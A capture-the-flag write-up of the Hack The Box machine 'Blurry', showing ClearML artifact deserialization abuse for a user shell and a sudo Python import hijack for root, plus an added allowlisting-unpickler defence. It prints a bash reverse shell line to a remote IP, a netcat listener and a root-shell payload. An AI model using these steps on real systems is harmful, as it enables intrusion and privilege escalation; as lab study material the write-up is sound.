> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2026-03-27

Hack The Box - Blurry (Linux)

ClearML artifact deserialization abuse grants shell as jippity, then writable model path and Python import hijack in evaluate_model lead to root.

Target

  • IP: 10.10.11.19

Recon

sudo nmap -sC -sV 10.10.11.19 -p- -T5 -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add these hosts to /etc/hosts:

  • app.blurry.htb
  • api.blurry.htb
  • files.blurry.htb

ClearML Setup

Browse to http://app.blurry.htb/.

The application is ClearML. Log in with any username (for example test12).

Go to profile settings, workspace, and add credentials. Copy the generated ClearML configuration.

pip install clearml
clearml-init

Paste the copied configuration when prompted.

Reference:

  • https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

Initial Access via Malicious Artifact

In project Black Swan, user Chad Jippity periodically runs a task that retrieves artifacts from tasks tagged review.

Create a task in that project with tag review and a malicious artifact object.

Create file rev:

bash -i >& /dev/tcp/10.10.16.43/4444 0>&1

Start listener and HTTP server:

nc -vlnp 4444
python3 -m http.server 80

Run exploit script:

  • exp.py

python3 exp.py

We get a reverse shell as jippity.
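
A defensive counterpart to the artifact abuse above, as an added example that is not part of the original writeup or of ClearML: a job that consumes artifacts from other users can deserialize them through an allowlisting unpickler, so a reference to any unexpected callable is refused before it is resolved. ALLOWED_GLOBALS, load_reviewed, triage and both sample blobs are assumptions constructed for illustration.

```python
import io
import pickle
import subprocess
from collections import OrderedDict

# Assumption: the only globals a reviewed artifact is expected to reference.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import anything outside ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        # Called for every GLOBAL / STACK_GLOBAL opcode, before the object
        # is imported, so a refused callable is never resolved or invoked.
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)


def load_reviewed(data: bytes):
    """Deserialize artifact bytes; raises UnpicklingError on a blocked global."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


def triage(data: bytes):
    """Return (accepted, detail) so a review job can log and skip bad artifacts."""
    try:
        return True, load_reviewed(data)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


# Constructed samples: plain data, and a blob that only *references* a
# process-spawning class (it is never called here).
BENIGN = pickle.dumps(OrderedDict(accuracy=0.93, labels=["cat", "dog"]))
SUSPECT = pickle.dumps({"model": subprocess.Popen})

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, triage(blob))
```

The allowlist stays empty of anything callable with side effects; artifacts that need richer types are better exchanged in a data-only format than by widening it.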

Stable User Access

ssh-keygen -f jippity

Add public key to authorized_keys, then connect:

ssh jippity@blurry.htb -i jippity

Privilege Escalation

sudo -l
Matching Defaults entries for jippity on blurry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jippity may run the following commands on blurry:
    (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

file /usr/bin/evaluate_model
Shell script

/models is writable by jippity.

Create a .pth model file:

python3
import torch
import torchvision
model = torchvision.models.resnet18()
torch.save(model, 'test.pth')

Create evaluate_model.py with:

import os
os.system('bash')

Run privileged script:

sudo /usr/bin/evaluate_model /models/test.pth

We get a root shell.